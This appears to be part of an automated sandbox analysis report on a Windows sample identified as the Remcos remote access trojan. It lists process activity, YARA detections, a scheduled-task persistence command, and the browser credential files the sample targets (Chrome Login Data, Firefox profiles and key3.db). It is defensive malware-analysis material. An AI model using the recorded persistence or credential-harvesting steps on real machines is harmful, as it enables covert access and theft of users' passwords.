            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]Program Manager
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4039686667.0000000001083000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GProgram Managery2
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dProgram Managerenh.dllllK
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GProgram Managerg
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GProgram ManagerG
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager1279140920l
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Program Manager
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager{
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004329DA cpuid 16_2_004329DA
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: EnumSystemLocalesW,16_2_0044F17B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: EnumSystemLocalesW,16_2_0044F130
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: EnumSystemLocalesW,16_2_0044F216
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,16_2_0044F2A3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetLocaleInfoA,16_2_0040E2BB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetLocaleInfoW,16_2_0044F4F3
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_0044F61C
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetLocaleInfoW,16_2_0044F723
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_0044F7F0
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: EnumSystemLocalesW,16_2_00445914
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: GetLocaleInfoW,16_2_00445E1C
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,16_2_0044EEB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeQueries volume information: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040A0B0 GetLocalTime,wsprintfW,16_2_0040A0B0
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004195F8 GetUserNameW,16_2_004195F8
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_004466BF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data16_2_0040A953
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\16_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: \key3.db16_2_0040AA71

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1
            Yara detected Remcos RAT
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: cmd.exe16_2_0040567A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		111
